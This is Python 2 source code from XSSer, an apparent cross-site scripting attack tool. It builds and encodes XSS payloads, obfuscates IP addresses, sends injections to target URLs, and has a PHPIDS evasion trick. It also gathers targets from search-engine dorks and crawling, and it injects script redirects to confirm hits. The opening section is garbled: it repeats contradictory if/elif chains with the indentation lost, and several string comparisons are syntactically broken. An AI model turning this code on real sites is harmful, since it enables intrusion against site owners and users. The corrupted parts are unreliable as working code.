if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.hash:
payloads = checker_payload + payloads
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.dcp:
payloads = payloads_dcp
if options.script:
payloads = payloads + manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.script:
payloads = manual_payload
if options.hash:
payloads = checker_payload + payloads
if options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads + payloads_httpsr
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.inducedcode:
payloads = payloads_httpsr
if options.hash:
payloads = checker_payload + payloads
if options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.heuristic:
payloads = heuristic_params
if options.hash:
payloads = checker_payload + payloads
if options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads + payloads_dom
elif options.dom:
payloads = payloads_dom
elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
payloads = [{"payload":'">PAYLOAD',
"browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
}]
else:
payloads = checker_payload
return payloads
def process_ipfuzzing(self, text):
"""
Mask ips in given text to DWORD
"""
ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
for ip in ips:
text = text.replace(ip, str(self._ipDwordEncode(ip)))
return text
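# illustrative example, assuming _ipDwordEncode returns the 32-bit decimal form:
# "http://127.0.0.1/" would become "http://2130706433/"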
def process_ipfuzzing_octal(self, text):
"""
Mask ips in given text to Octal
"""
ips = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
for ip in ips:
text = text.replace(ip, str(self._ipOctalEncode(ip)))
return text
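# illustrative example, assuming _ipOctalEncode zero-pads each octet in octal:
# "127.0.0.1" would become something like "0177.0000.0000.0001"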
def process_payloads_ipfuzzing(self, payloads):
"""
Mask ips for all given payloads using DWORD
"""
# ip fuzzing (DWORD)
if self.options.Dwo:
resulting_payloads = []
for payload in payloads:
payload["payload"] = self.process_ipfuzzing(payload["payload"])
resulting_payloads.append(payload)
return resulting_payloads
return payloads
def process_payloads_ipfuzzing_octal(self, payloads):
"""
Mask ips for all given payloads using OCTAL
"""
# ip fuzzing (OCTAL)
if self.options.Doo:
resulting_payloads = []
for payload in payloads:
payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
resulting_payloads.append(payload)
return resulting_payloads
return payloads
def get_query_string(self):
"""
Get the supplied query string.
"""
if self.options.postdata:
return self.options.postdata
elif self.options.getdata:
return self.options.getdata
return ""
def attack_url(self, url, payloads, query_string):
"""
Attack the given url, optionally checking first if it is alive.
"""
if self.options.nohead:
for payload in payloads:
self.attack_url_payload(url, payload, query_string)
else:
hc = Curl()
try:
urls = hc.do_head_check([url])
except:
print "Target url: (" + url + ") is malformed" + " [DISCARDED]" + "\n"
return
if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
if str(hc.info()["http-code"]) in ["301"]:
url = str(hc.info()["Location"])
payload = ""
query_string = ""
elif str(hc.info()["http-code"]) in ["302"]:
url = url + "/"
payload = ""
query_string = ""
print "\nHEAD alive check for the target: (" + url + ") is OK" + "(" + hc.info()["http-code"] + ") [AIMED]\n"
self.success_connection = self.success_connection + 1
for payload in payloads:
self.attack_url_payload(url, payload, query_string)
else:
print "\nHEAD alive check for the target: (" + url + ") is FAILED(" + hc.info()["http-code"] + ") [DISCARDED]" + "\n"
self.not_connection = self.not_connection + 1
def get_url_payload(self, url, payload, query_string, attack_payload=None):
"""
Build the attack url (and its verification hash) for the given payload and query string.
"""
options = self.options
self._ongoing_attacks = {}
# get payload/vector
payload_string = payload['payload'].strip()
# if PHPIDS (>0.6.5) exploit is invoked
if options.phpids:
payload_string = 32*payload_string + payload_string
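# i.e. 33 copies of the vector (32 + the original); the repetition is the
# PHPIDS (>0.6.5) evasion trick this option relies on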
# substitute the attack hash
url_orig_hash = self.generate_hash('url')
payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
hashed_payload = payload_string.replace('XSS', url_orig_hash)
if attack_payload:
# url for real attack
hashed_vector_url = self.encoding_permutations(attack_payload)
else:
# test
hashed_vector_url = self.encoding_permutations(hashed_payload)
self._ongoing_attacks['url'] = url_orig_hash
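# urls containing the VECTOR marker carry the injection point explicitly;
# otherwise the (encoded) payload is appended after the query string, adding
# a "/" when the url has neither a query string nor a trailing slash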
if 'VECTOR' in url:
# this url comes with vector included
dest_url = url.strip().replace('VECTOR', hashed_vector_url)
else:
payload_url = query_string.strip() + hashed_vector_url
if not query_string and not url.strip().endswith("/"):
dest_url = url.strip() + '/' + payload_url
else:
dest_url = url.strip() + payload_url
return dest_url, url_orig_hash
def attack_url_payload(self, url, payload, query_string):
if not self.pool:
pool = self.mothership.pool
else:
pool = self.pool
c = Curl()
def _cb(request, result):
self.finish_attack_url_payload(c, request, result, payload,
query_string, url, newhash)
def _error_cb(request, error):
self.error_attack_url_payload(c, url, request, error)
if self.options.getdata or not self.options.postdata:
dest_url, newhash = self.get_url_payload(url, payload, query_string)
#self.report(dest_url)
self._prepare_extra_attacks()
pool.addRequest(c.get, [dest_url], _cb, _error_cb)
self._ongoing_requests += 1
#c.get(dest_url)
if self.options.postdata:
dest_url, newhash = self.get_url_payload("", payload, query_string)
dest_url = dest_url.strip().replace("/", "", 1)
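# the leading "/" that get_url_payload prepends is stripped here so the
# remaining string can be sent as POST data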
self.report("\nSending POST:", query_string, "\n")
data = c.post(url, dest_url)
self._prepare_extra_attacks()
pool.addRequest(c.get, [dest_url], _cb, _error_cb)
self._ongoing_requests += 1
#c.post(url, dest_url)
def error_attack_url_payload(self, c, url, request, error):
self._ongoing_requests -= 1
for reporter in self._reporters:
reporter.mosquito_crashed(url, str(error[0]))
dest_url = request.args[0]
self.report("Failed attempt (URL Malformed!?): " + url + "\n")
self.urlmalformed = True
#self.report(self.urlmalformed)
if self.urlmalformed == True and self.urlspoll[0] == url:
self.land()
self.report(str(error[0]))
if DEBUG:
traceback.print_tb(error[2])
c.close()
del c
return
def finish_attack_url_payload(self, c, request, result, payload,
query_string, url, orig_hash):
#if self.next_jumper == True:
# self.next_jumper = False
# return
#else:
self.report('='*75)
self.report("Target: " + url + " --> " + str(self.time))
self.report('='*75 + "\n")
#self.report(self.urlspoll)
self._ongoing_requests -= 1
dest_url = request.args[0]
#self.report(dest_url)
# adding constant head check number flag
if self.options.isalive:
self.flag_isalive_num = int(self.options.isalive)
if self.options.isalive <= 0:
pass
elif self.options.isalive and self.options.nohead:
self.errors_isalive = self.errors_isalive + 1
if self.errors_isalive > self.options.isalive:
pass
else:
self.report("---------------------")
self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
if self.next_isalive == True:
hc = Curl()
self.next_isalive = False
try:
urls = hc.do_head_check([url])
#self.report(url)
except:
print "Target url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
self.errors_isalive = 0
return
if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n"
print "- Your target still Alive: " + "(" + url + ")"
print "- If you are recieving continuous 404 errors requests on your injections, but your target is alive, is because:\n"
print " - your injections are failing: totally normal :-)"
print " - maybe exists some IPS/NIDS/... systems blocking your requests\n"
else:
if str(hc.info()["http-code"]) == "0":
print "\nTarget url: (" + url + ") is unaccesible" + " [DISCARDED]" + "\n"
else:
print "HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n"
print "- Your target " + "(" + url + ")" + " looks that is NOT alive"
print "- If you are recieving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target, try to; STOP THIS TEST!!\n"
self.errors_isalive = 0
else:
if self.errors_isalive >= int(self.options.isalive):
self.report("---------------------")
self.report("\nAlive System: XSSer is checking if your target still alive. [Response is comming...]\n")
self.next_isalive = True
self.options.isalive = self.flag_isalive_num
else:
if self.options.isalive and not self.options.nohead:
self.report("---------------------")
self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default, to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
self.report("---------------------")
# check results on an alternative url, choosing method and parameters (or not)
if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
self.options.altm = "GET"
if self.options.altm == "post":
self.options.altm = "POST"
if self.options.alt == None:
pass
else:
self.report("="*45)
self.report("[+] Checking Response Options:", "\n")
self.report("[+] Url:", self.options.alt)
self.report("[-] Method:", self.options.altm)
if self.options.ald:
self.report("[-] Parameter(s):", self.options.ald, "\n")
else:
self.report("[-] Parameter(s):", query_string, "\n")
# perform normal injection
if c.info()["http-code"] in ["200", "302", "301"]:
if self.options.statistics:
self.success_connection = self.success_connection + 1
self._report_attack_success(c, dest_url, payload,
query_string, url, orig_hash)
else:
self._report_attack_failure(c, dest_url, payload,
query_string, url, orig_hash)
# checking response results
if self.options.alt == None:
pass
else:
self.report("="*45)
self.report("[+] Checking Response Results:", "\n")
self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
if 'PAYLOAD' in payload['payload']:
user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
if self.options.ald:
query_string = self.options.ald
if "VECTOR" in self.options.alt:
dest_url = self.options.alt
else:
if not dest_url.endswith("/"):
dest_url = dest_url + "/"
if self.options.altm == 'POST':
dest_url = "" + query_string + user_attack_payload
dest_url = dest_url.strip().replace("/", "", 1)
data = c.post(url, dest_url)
self._prepare_extra_attacks()
#c.post(url, dest_url)
else:
dest_url = self.options.alt + query_string + user_attack_payload
c.get(dest_url)
#if self.options.verbose:
# self.report(str(c.info()))
# self.report(str(c.body()))
# perform check response injection
if c.info()["http-code"] in ["200", "302", "301"]:
if self.options.statistics:
self.success_connection = self.success_connection + 1
self._report_attack_success(c, dest_url, payload,
query_string, url, orig_hash)
else:
self._report_attack_failure(c, dest_url, payload,
query_string, url, orig_hash)
c.close()
del c
# jumper system
#if self.options.jumper <= 0:
# pass
#elif self.options.jumper:
# if self.options.jumper == 1:
# self.report("This spell with 1 jumper requires special threading methods. Poll correctly reordered!?")
# self.errors_jumper = self.errors_jumper + 1
# if self.errors_jumper > self.options.jumper:
# pass
# else:
# self.report("---------------------")
# self.report("Jumps Checker for: " + url + " - [", self.errors_jumper, "/", self.options.jumper, "]\n")
# if self.next_jumper == True:
# try:
# del self.urlspoll[0]
# self.report("Next target: [Ready!]")
# self.next_jumper = False
# self.errors_jumper = 0
# except:
# self.report("Next target: [Not Found!]... [Finishing test]")
# self.land()
# else:
# if self.errors_jumper >= self.options.jumper:
# self.report("---------------------")
# self.report("[Jumping...]\n")
# self.next_jumper = True
# self.errors_jumper = 0
# if self.urlspoll[0] == url:
# self.land()
def encoding_permutations(self, enpayload_url):
"""
Perform encoding permutations on the url and query_string.
"""
options = self.options
if options.Cem:
enc_perm = options.Cem.split(",")
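# --Cem chains encoders in the order given, e.g. "Str,Hex" (names illustrative);
# self.encmap is assumed to map each encoder name to its encoding callable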
for _enc in enc_perm:
enpayload_url = self.encmap[_enc](enpayload_url)
else:
for enctype in self.encmap.keys():
if getattr(options, enctype):
enpayload_url = self.encmap[enctype](enpayload_url)
return enpayload_url
def _report_attack_success(self, curl_handle, dest_url, payload,\
query_string, orig_url, url_orig_hash):
"""
report success of an attack
"""
if orig_url not in self.successfull_urls:
self.successfull_urls.append(orig_url)
options = self.options
self.report("-"*45)
if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[-] Hashing: " + url_orig_hash)
if payload['browser'] == "[Heuristic test]":
self.report("[+] Checking: " + str(payload['payload']).strip('XSS'))
else:
self.report("[+] Trying: " + dest_url.strip())
if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
pass
else:
self.report("[+] Browser Support: " + payload['browser'])
# statistics injections counters
if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
self.check_positives = self.check_positives + 1
elif payload['browser']=="[Data Control Protocol Injection]":
self.dcp_injection = self.dcp_injection + 1
elif payload['browser']=="[Document Object Model Injection]":
self.dom_injection = self.dom_injection + 1
elif payload['browser']=="[Induced Injection]":
self.httpsr_injection = self.httpsr_injection + 1
elif payload['browser']=="[manual_injection]":
self.manual_injection = self.manual_injection + 1
else:
self.auto_injection = self.auto_injection +1
if options.verbose:
self.report("[-] Headers Results:\n")
self.report(curl_handle.info())
# if you need more data about your connection(s), uncomment this two lines:
#self.report("[-] Body Results:\n")
#self.report(curl_handle.body())
self.report("-"*45)
if payload['browser']=="[Heuristic test]":
pass
else:
self.report("[-] Injection Results:")
# check attacks success
for attack_type in self._ongoing_attacks:
#hashing = self._ongoing_attacks[attack_type]
hashing = url_orig_hash
# checking heuristic responses
if payload['browser']=="[Heuristic test]":
heuristic_param = str(payload['payload']).strip('XSS')
heuristic_string = str(hashing)
if heuristic_string in curl_handle.body():
# ascii
if heuristic_param == "\\":
self.heuris_backslash_founded = self.heuris_backslash_founded + 1
# / is the same on ASCII and Unicode
elif heuristic_param == "/":
self.heuris_slash_founded = self.heuris_slash_founded + 1
self.heuris_une_slash_founded = self.heuris_une_slash_founded + 1
elif heuristic_param == ">":
self.heuris_mayor_founded = self.heuris_mayor_founded + 1
elif heuristic_param == "<":
self.heuris_minor_founded = self.heuris_minor_founded + 1
elif heuristic_param == ";":
self.heuris_semicolon_founded = self.heuris_semicolon_founded + 1
elif heuristic_param == "'":
self.heuris_colon_founded = self.heuris_colon_founded + 1
elif heuristic_param == '"':
self.heuris_doublecolon_founded = self.heuris_doublecolon_founded + 1
elif heuristic_param == "=":
self.heuris_equal_founded = self.heuris_equal_founded + 1
# une
elif heuristic_param == "%5C":
self.heuris_une_backslash_founded = self.heuris_une_backslash_founded + 1
elif heuristic_param == "%3E":
self.heuris_une_mayor_founded = self.heuris_une_mayor_founded + 1
elif heuristic_param == "%3C":
self.heuris_une_minor_founded = self.heuris_une_minor_founded + 1
elif heuristic_param == "%3B":
self.heuris_une_semicolon_founded = self.heuris_une_semicolon_founded + 1
elif heuristic_param == "%27":
self.heuris_une_colon_founded = self.heuris_une_colon_founded + 1
elif heuristic_param == "%22":
self.heuris_une_doublecolon_founded = self.heuris_une_doublecolon_founded + 1
elif heuristic_param == "%3D":
self.heuris_une_equal_founded = self.heuris_une_equal_founded + 1
# dec
elif heuristic_param == "\":
self.heuris_dec_backslash_founded = self.heuris_dec_backslash_founded + 1
elif heuristic_param == "/":
self.heuris_dec_slash_founded = self.heuris_dec_slash_founded + 1
elif heuristic_param == ">":
self.heuris_dec_mayor_founded = self.heuris_dec_mayor_founded + 1
elif heuristic_param == "<":
self.heuris_dec_minor_founded = self.heuris_dec_minor_founded + 1
elif heuristic_param == ";":
self.heuris_dec_semicolon_founded = self.heuris_dec_semicolon_founded + 1
elif heuristic_param == "'":
self.heuris_dec_colon_founded = self.heuris_dec_colon_founded + 1
elif heuristic_param == """:
self.heuris_dec_doublecolon_founded = self.heuris_dec_doublecolon_founded + 1
elif heuristic_param == "=":
self.heuris_dec_equal_founded = self.heuris_dec_equal_founded + 1
self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
else:
if heuristic_param == "\\":
self.heuris_backslash_notfounded = self.heuris_backslash_notfounded + 1
elif heuristic_param == "/":
self.heuris_slash_notfounded = self.heuris_slash_notfounded + 1
elif heuristic_param == ">":
self.heuris_mayor_notfounded = self.heuris_mayor_notfounded + 1
elif heuristic_param == "<":
self.heuris_minor_notfounded = self.heuris_minor_notfounded + 1
elif heuristic_param == ";":
self.heuris_semicolon_notfounded = self.heuris_semicolon_notfounded + 1
elif heuristic_param == "'":
self.heuris_colon_notfounded = self.heuris_colon_notfounded + 1
elif heuristic_param == '"':
self.heuris_doublecolon_notfounded = self.heuris_doublecolon_notfounded + 1
elif heuristic_param == "=":
self.heuris_equal_notfounded = self.heuris_equal_notfounded + 1
else:
# only add a success if hashing is on body, and we have a 200 OK http code response
if hashing in curl_handle.body() and str(curl_handle.info()["http-code"]) == "200":
# some anti false positives manual checkers
if 'PAYLOAD' in payload['payload']:
user_attack_payload = payload['payload'].replace('PAYLOAD', url_orig_hash)
if str('/>' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
#self.report("FAILED: default")
#self.report(user_attack_payload)
self.add_failure(dest_url, payload, hashing, query_string, attack_type)
else:
#self.report("VULNERABLE")
self.add_success(dest_url, payload, hashing, query_string, orig_url, attack_type)
else:
#self.report("FAILED: not valid request")
self.add_failure(dest_url, payload, hashing, query_string, attack_type)
def add_failure(self, dest_url, payload, hashing, query_string, method='url'):
"""
Add an attack that failed to inject
"""
if payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[+] Checking: " + method + " attack with " + payload['payload'] + "... fail\n")
options = self.options
for reporter in self._reporters:
reporter.add_failure(dest_url)
if options.script:
self.hash_notfound.append((dest_url, "Manual injection", method, hashing))
else:
self.hash_notfound.append((dest_url, payload['browser'], method, hashing))
if options.verbose:
self.report("Searching hash: " + hashing + " in target source code...\n")
self.report("Injection failed!\n")
def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
"""
Add an attack that managed to inject the code
"""
if payload['browser'] == "[manual_injection]":
self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
elif payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[+] Checking: " + method + " attack with " + payload['payload'].strip() + "... ok\n")
for reporter in self._reporters:
reporter.add_success(dest_url)
if self.options.reversecheck:
if self.options.dcp or self.options.inducedcode or self.options.dom:
pass
else:
self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
if self.options.verbose:
self.report("Searching hash: " + hashing + " in target source code...\n")
self.report("This injection is reflected by target, so can be a vulnerability!! :)\n")
self.report("Try a --reverse-check connection to validate that is 100% vulnerable\n")
def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
self.report("[-] Trying reverse connection from:", orig_url + query_string)
if "VECTOR" in orig_url:
dest_url = orig_url
else:
if not dest_url.endswith("/"):
dest_url = dest_url + "/"
dest_url = orig_url + query_string + payload['payload']
tok_url = None
self_url = "http://localhost:19084/success/" + hashing
shadow_js_inj = "document.location=document.location.hash.substring(1)"
shadow_inj = "<script>" + shadow_js_inj + "</script>"
shadow_js_inj = shadow_js_inj
dest_url = dest_url.split("#")[0]
def requote(what):
return urllib.quote_plus(what)
vector_and_payload = payload['payload']
_e = self.encoding_permutations
if 'VECTOR' in dest_url:
dest_url = dest_url.replace('VECTOR', vector_and_payload)
if '">PAYLOAD' in dest_url:
tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
tok_url += '#' + self_url
elif "'>PAYLOAD" in dest_url:
tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
tok_url += '#' + self_url
elif "javascript:PAYLOAD" in dest_url:
tok_url = dest_url.replace('javascript:PAYLOAD',
self.encoding_permutations("window.location='" + self_url+"';"))
tok_url = dest_url.replace("javascript:PAYLOAD",
_e("javascript:" + shadow_js_inj))
tok_url+= '#' + self_url
elif '"PAYLOAD"' in dest_url:
tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
elif "'PAYLOAD'" in dest_url:
tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif "SCRIPT" in dest_url:
tok_url = dest_url.replace('PAYLOAD',
shadow_js_inj)
tok_url += '#' + self_url
elif 'onerror="PAYLOAD"' in dest_url:
tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
tok_url+= '#' + self_url
elif 'onerror="javascript:PAYLOAD"' in dest_url:
tok_url = dest_url.replace('javascript:PAYLOAD',
self.encoding_permutations("window.location='" + self_url+"';"))
tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
_e('onerror="javascript:' + shadow_js_inj + '"'))
tok_url+= '#' + self_url
elif '<PAYLOAD>' in dest_url:
tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
tok_url+= '#' + self_url
elif 'PAYLOAD' in dest_url:
tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
tok_url+= '#' + self_url
elif 'href' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
elif 'url' in dest_url and 'PAYLOAD' in dest_url:
tok_url = dest_url.replace('PAYLOAD', self_url)
self.final_attacks[hashing] = {'url': tok_url}
if tok_url:
self._webbrowser.open(tok_url)
else:
print("Cant apply any heuristic for final check on url: " + dest_url)
def _report_attack_failure(self, curl_handle, dest_url, payload,\
attack_vector, orig_url, url_orig_hash):
"""
report failure of an attack
"""
options = self.options
self.hash_notfound.append((dest_url, payload['browser'], "errorcode"))
self.report("-"*45)
for reporter in self._reporters:
reporter.add_failure(dest_url)
if payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]" or payload['browser'] == "[Heuristic test]":
pass
else:
self.report("[-] Hashing: " + url_orig_hash)
if payload['browser'] == "[Heuristic test]":
self.report("[+] Trying: " + str(payload['payload']).strip('XSS'))
else:
self.report("[+] Trying: " + dest_url.strip())
self.report("[+] Browser Support: " + payload['browser'])
# statistics injections counters
if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
self.check_positives = self.check_positives + 1
elif payload['browser']=="[Data Control Protocol Injection]":
self.dcp_injection = self.dcp_injection + 1
elif payload['browser']=="[Document Object Model Injection]":
self.dom_injection = self.dom_injection + 1
elif payload['browser']=="[Induced Injection]":
self.httpsr_injection = self.httpsr_injection + 1
elif payload['browser']=="[manual_injection]":
self.manual_injection = self.manual_injection + 1
else:
self.auto_injection = self.auto_injection +1
if options.verbose:
self.report("[-] Headers Results:\n")
self.report(str(curl_handle.info()))
self.report("-"*45)
self.report("[-] Injection Results:")
if str(curl_handle.info()["http-code"]) == "404":
self.report("\n404 Not Found: The server has not found anything matching the Request-URI\n")
elif str(curl_handle.info()["http-code"]) == "403":
self.report("\n403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
elif str(curl_handle.info()["http-code"]) == "400":
self.report("\n400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
elif str(curl_handle.info()["http-code"]) == "401":
self.report("\n401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are correctly typed\n")
elif str(curl_handle.info()["http-code"]) == "407":
self.report("\n407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
elif str(curl_handle.info()["http-code"]) == "408":
self.report("\n408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
elif str(curl_handle.info()["http-code"]) == "500":
self.report("\n500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
elif str(curl_handle.info()["http-code"]) == "501":
self.report("\n501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
elif str(curl_handle.info()["http-code"]) == "502":
self.report("\n502 Bad Gateway: The server received an invalid response from the upstream server.\n")
elif str(curl_handle.info()["http-code"]) == "503":
self.report("\n503 Service Unavailable: The server is currently unable to handle the request due to a temporary overloading\n")
elif str(curl_handle.info()["http-code"]) == "504":
self.report("\n504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
elif str(curl_handle.info()["http-code"]) == "0":
self.report("\nXSSer is not working propertly with this injection:\n - Is something blocking our connection(s)?\n - Is target url correctly builded?: (" + orig_url + ")\n - Revise that parameters launched are correct\n")
else:
self.report("\nNot injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")")
if self.options.statistics:
if str(curl_handle.info()["http-code"]) == "404":
self.not_connection = self.not_connection + 1
elif str(curl_handle.info()["http-code"]) == "503":
self.forwarded_connection = self.forwarded_connection + 1
else:
self.other_connection = self.other_connection + 1
def check_positive(self, curl_handle, dest_url, payload, attack_vector):
"""
Perform extra check for positives
"""
body = curl_handle.body()
# should check ongoing_attacks here
# perform extra checks
pass
def create_options(self, args=None):
"""
Create the program options for OptionParser.
"""
self.optionParser = XSSerOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
def _get_attack_urls(self):
"""
Process payload options and make up the payload list for the attack.
"""
urls = []
options = self.options
p = self.optionParser
if options.imx:
self.create_fake_image(options.imx, options.script)
#sys.exit()
return []
if options.flash:
self.create_fake_flash(options.flash, options.script)
#sys.exit()
return []
if options.update:
# XXX implement XSSer autoupdater
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("\nCheck manually for latest 'stable' XSSer version:\n")
self.report("- http://sourceforge.net/projects/xsser/files/")
self.report("\nOr clone sources directly from -svn- repository:\n")
self.report("$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser\n")
#sys.exit()
return []
if options.url:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from URL] injections... looks like your target is good defined ;)")
self.report('='*75)
urls = [options.url]
elif options.readfile:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from file] injections... let me see this list ;)")
self.report('='*75)
try:
f = open(options.readfile)
urls = f.readlines()
urls = [ line.replace('\n','') for line in urls ]
f.close()
except:
import os.path
if os.path.exists(options.readfile) == True:
self.report('\nThere were errors opening the file: ', options.readfile, "\n")
else:
self.report('\nThe file: ', options.readfile, " doesn't exist!!\n")
elif options.dork:
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("Testing [XSS from Dork] injections...good luck ;)")
self.report('='*75)
dorker = Dorker(options.dork_engine)
try:
urls = dorker.dork(options.dork)
except Exception, e:
for reporter in self._reporters:
reporter.mosquito_crashed(dorker.search_url, str(e.message))
else:
for url in urls:
for reporter in self._reporters:
reporter.add_link(dorker.search_url, url)
if options.crawling:
nthreads = options.threads
self.crawled_urls = list(urls)
all_crawled = []
for url in set(urls):
self.report("Crawling", url, options.crawling,
options.crawler_width)
crawler = Crawler(self, Curl, all_crawled,
self.pool)
#max(1, int(nthreads/len(urls))))
crawler.set_reporter(self)
#if not self._landing:
# for reporter in self._reporters:
# reporter.start_crawl(url)
# add work request
#self.start_crawl(crawler, url, options)
# now wait for all results to arrive
while urls:
self.run_crawl(crawler, urls.pop(), options)
while not self._landing:
for reporter in self._reporters:
reporter.report_state('broad scanning')
try:
self.pool.poll()
except NoResultsPending:
# if urls:
# self.run_crawl(crawler, urls.pop(), options)
#else:
crawler.cancel()
break
if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
self.report("Founded enough results... calling all mosquitoes home", options.crawling)
crawler.cancel()
break
time.sleep(0.1)
self.report("Mosquitoes founded a total of: " + str(len(self.crawled_urls)) + " urls")
return self.crawled_urls
if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
return urls
